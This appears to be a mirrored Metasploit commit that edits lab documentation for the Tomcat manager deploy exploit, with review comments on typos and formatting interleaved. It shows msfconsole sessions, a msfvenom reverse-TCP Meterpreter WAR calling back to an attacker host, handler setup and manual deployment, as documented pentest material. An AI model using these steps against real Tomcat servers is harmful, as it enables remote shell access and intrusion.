mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-05 14:57:30 +01:00

more cleanup

This commit is contained in:
h00die 2017-01-15 11:56:11 -05:00
parent bed08db43c
commit f7276a6a39


@ -1,21 +1,22 @@
# Documentation Format
This documentation is slightly different from the standard module documentation due to the variation in variables/privileges/versions that can affect how exploitation happens.
This documentation is broken down by OS, Tomcat version, then privilege to show exploitation at each way.
This documentation is broken down by OS, Tomcat version, then privilege to show exploitation in each variation.
# Cleanup
It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat. This must be done manually.
It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat. This must be done [manually](#manual-cleanup).
## Windows (xp sp2)
### Tomcat 6 (6.0.48)
#### Setup
1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
1. Download and install the pre-req [Java7](htp://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
2. Download and install [Tomcat6](http://apache.osuosl.org/tomcat/tomcat-6/v6.0.48/bin/apache-tomcat-6.0.48.exe)
The install was default, other than adding a user during install. No other options were changed. The install assgined the new user the role `manager-gui`, which is Tomcat 7+ syntax.
For this exploitation, it was changed to simply `manager`
For this exploitation, it was changed to simply `manager`.
#### text/script Interface Exploitation
#### text/script Interface
1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 6.0\tomcat-users.xml` to add the following under the `<tomcat-users>` line:
```
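Review bot: the changed Java7 link now reads `htp://www.oracle.com/...`, a typo for `http://`, so the link is still broken after this edit; the Tomcat 7 and Tomcat 8 sections later in this same commit use `http://`. Suggest `[Java7](http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)`. Two smaller points in the same hunk: the unchanged context line still spells `assgined` for `assigned`, and this hunk renames the Tomcat 6 heading to `#### text/script Interface` while the Tomcat 7 and 8 hunks below rename theirs to `#### text/script Interface Exploitation`; pick one form for all three sections.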
@ -24,6 +25,7 @@ For this exploitation, it was changed to simply `manager`
```
2. Restart Tomcat service
3. Exploit:
```
@ -63,17 +65,21 @@ For this exploitation, it was changed to simply `manager`
Meterpreter : java/windows
```
### Tomcat 7 (7.0.73)
Of note, as of Tomcat 7, the permission role `manager` has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation.
#### Setup
1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
1. Download and install the pre-req [Java7](http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
2. Download and install [Tomcat7](http://apache.osuosl.org/tomcat/tomcat-7/v7.0.73/bin/apache-tomcat-7.0.73.exe)
The install was default, other than adding a user during install. No other options were changed.
Of note, while the user was given `manager-gui` permissions, they didn't actually define that role.
So the `/manager/html` page was visible, but deploying from there wasn't possible.
#### text/script Interface
#### text/script Interface Exploitation
1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 7.0\tomcat-users.xml` to add the following under the `<tomcat-users>` line:
```
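Review bot: the context sentence `Each sub role the user has will change which `path` variable for exploitation.` is missing its verb and is repeated verbatim in the Tomcat 8 and Linux sections; while the headings here are being edited it would be worth rewording to something like `Each sub-role the user holds changes which `path` value is needed for exploitation.` The `http://` fix on the Java7 link in this hunk is correct and is what the Tomcat 6 hunk above should also have used.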
@ -82,6 +88,7 @@ So the `/manager/html` page was visible, but deploying from there wasn't possibl
```
2. Restart the service
3. Exploitation:
```
@ -126,16 +133,18 @@ So the `/manager/html` page was visible, but deploying from there wasn't possibl
```
### Tomcat 8 (8.0.39)
Of note, as of Tomcat 7, the permission role `manager` has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation.
#### Setup
1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
1. Download and install the pre-req [Java7](http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
2. Download and install [Tomcat8](http://apache.osuosl.org/tomcat/tomcat-8/v8.0.39/bin/apache-tomcat-8.0.39.exe)
The install was default, other than adding a user during install. No other options were changed.
Of note, while the user was given `manager-gui` permissions, they didn't actually define that role.
So the /manager/html page was visible, but deploying from there wasn't possible.
So the `/manager/html` page was visible, but deploying from there wasn't possible.
#### text/script interface
#### text/script Interface Exploitation
1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xml` to add the following under the `<tomcat-users` line:
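Review bot: the context line ends with `under the `<tomcat-users` line:` and is missing the closing `>`; the Tomcat 6 and Tomcat 7 sections write `<tomcat-users>`. It is not part of this change but sits directly under the heading being edited, so fixing it here avoids a misleading XML fragment in the docs.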
@ -145,6 +154,7 @@ So the /manager/html page was visible, but deploying from there wasn't possible.
```
2. Restart the service
3. Exploitation:
```
@ -183,7 +193,9 @@ So the /manager/html page was visible, but deploying from there wasn't possible.
```
## Linux
### Tomcat6 (6.0.39) - Ubuntu server 14.04 64bit
#### Setup
1. Install Tomcat and dependencies: `sudo apt-get install tomcat6 tomcat6-admin`
@ -198,6 +210,7 @@ So the /manager/html page was visible, but deploying from there wasn't possible.
```
2. Restart Tomcat: `sudo service tomcat6 restart`
3. Exploit:
```
@ -238,12 +251,12 @@ So the /manager/html page was visible, but deploying from there wasn't possible.
```
### Tomcat7 (7.0.68) - Ubuntu server 16.04 64bit
Of note, as of Tomcat 7, the permission role 'manager' has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation.
Of note, as of Tomcat 7, the permission role `manager` has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation.
#### Setup
1. Install Tomcat and dependencies: `apt-get install tomcat7 tomcat7-admin`
#### text/script interface
#### text/script Interface Exploitation
1. Edit `/etc/tomcat7/tomcat-users.xml` to add:
@ -255,6 +268,7 @@ Of note, as of Tomcat 7, the permission role 'manager' has been divided into sev
2. Restart Tomcat: `sudo service tomcat7 restart`
1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy]
` as opposed to `403 Access Denied`
3. Exploit:
```
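Review bot: the added verification step is numbered `1.` between `2. Restart Tomcat` and `3. Exploit:`; in the raw file the list should read `3.` for the check and `4.` for the exploit step. The inline code span is also split across two lines (`[/deploy]` at the end of one line, then a line beginning with a lone backtick before ` as opposed to`), which will not render as a single code span; keep `FAIL - Invalid parameters supplied for command [/deploy]` inside one pair of backticks on one line. Finally, `http://192.168.2.118:8087/manager/text/deploy` is the author's lab host; the `## Deploy` section below uses `http://<ip>:<port>/manager/html`, so `http://<ip>:<port>/manager/text/deploy` would be consistent and less confusing for readers.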
@ -297,24 +311,31 @@ Of note, as of Tomcat 7, the permission role 'manager' has been divided into sev
Meterpreter : x86/linux
```
#### gui interface
Attempted to get the the GUI one to work, I wasn't able to. I believe you need to set the permission `manager-gui`, and possibly alter `PATH` to `/manager/html`. However, my attempts were unsuccessful.
#### gui Interface
The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`. However, my attempts were unsuccessful. [Manual exploitation is possible](#manual-exploitation)
### Tomcat8 (8.0.32) - Ubuntu server 16.04 64bit
Of note, as of 7, the permission role 'manager' has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation.
#### Setup
1. `apt-get install tomcat8 tomcat8-admin`
#### text/script interface
#### text/script Interface Exploitation
1. Edit `/etc/tomcat8/tomcat-users.xml` to add:
```
<role rolename="manager-script"/>
<user username="tomcat" password="tomcat" roles="manager-script"/>
```
2. Restart tomcat: `sudo service tomcat8 restart`
1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy]
` as opposed to `403 Access Denied`
3. Exploit:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
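Review bot: in the new `#### gui Interface` text, `The permission `manager-gui`, is required` has a stray comma after the code span, and the closing sentence `[Manual exploitation is possible](#manual-exploitation)` has no terminating period. The Tomcat 8 part of this hunk repeats the two problems from the Tomcat 7 hunk above: the verification step is numbered `1.` after `2.`, and the `FAIL - Invalid parameters supplied for command [/deploy]` code span is broken across two lines. The unchanged intro line for Tomcat 8 also says `as of 7` where every other section says `as of Tomcat 7`.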
@ -353,17 +374,18 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
Architecture : x64
Meterpreter : x86/linux
```
#### gui interface
Attempted to get the the GUI one to work, I wasn't able to. I believe you need to set the permission `manager-gui`, and possibly alter `PATH` to `/manager/html`. However, my attempts were unsuccessful.
#### gui Interface
The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`. However, my attempts were unsuccessful. [Manual exploitation is possible](#manual-exploitation)
# Manual Exploitation
## Create payload
This was performed on Windows XP with the following permissions as the user that was used to login:
Tomcat 6.0.48: manager
Tomcat 7.0.73: manager-gui
Tomcat 8.0.39: manager-gui
* Tomcat 6.0.48: manager
* Tomcat 7.0.73: manager-gui
* Tomcat 8.0.39: manager-gui
```
/metasploit-framework# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=7777 -f war -o meterp.war
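Review bot: the same stray comma in `The permission `manager-gui`, is required` and the missing period after the `(#manual-exploitation)` link recur here, so both gui sections should be corrected together. Converting the three Tomcat version lines into a `*` bullet list is a good change; the heading `#### gui Interface` could be `#### GUI Interface` since GUI is an acronym, matching the capitalised `Interface Exploitation` headings elsewhere in the file.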
@ -371,7 +393,9 @@ Payload size: 6072 bytes
Final size of war file: 6072 bytes
Saved as: meterp.war
```
## Setup Handler
```
msf > use exploit/multi/handler
msf exploit(handler) > set payload java/meterpreter/reverse_tcp
@ -385,7 +409,9 @@ msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.2.117:7777
[*] Starting the payload handler...
```
## Deploy
1. With a web browser, browse to `http://<ip>:<port>/manager/html`
2. Enter credentials (no default)
3. Under `Deploy` > `WAR file to deploy`, click browse to select `meterp.war`, click `Deploy`
@ -405,6 +431,6 @@ OS : Windows XP 5.1 (x86)
Meterpreter : java/windows
```
## Cleanup
## Manual Cleanup
This will NOT remove the meterpreter from Tomcat, click `Undeploy` within the `Application` list to remove `meterp` from Tomcat.
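Review bot: renaming `## Cleanup` to `## Manual Cleanup` correctly matches the `(#manual-cleanup)` anchor added in the first hunk. The sentence under it, `This will NOT remove the meterpreter from Tomcat, click `Undeploy` ...`, is a comma splice and `This` has no clear referent; suggest splitting it and naming the subject as the top-level `# Cleanup` section does, e.g. `The exploit will NOT remove the meterpreter WAR from Tomcat. Click `Undeploy` within the `Application` list to remove `meterp` from Tomcat.`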